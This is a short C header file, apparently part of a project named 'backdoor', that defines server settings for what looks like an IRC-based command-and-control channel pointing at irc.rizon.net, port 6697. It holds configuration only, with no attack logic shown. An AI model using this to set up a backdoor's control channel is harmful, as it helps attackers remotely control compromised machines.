backdoor/include/cfg.h
2024-04-21 19:39:15 +03:00

14 lines
193 B
C

typedef struct {
int use_ssl;
char *ip;
int port;
char *pre_cmd;
char *channel;
char *channel_key;
} SERVER;
SERVER servers[] = {
{1, "irc.rizon.net", 6697, NULL, "#channel", NULL}
};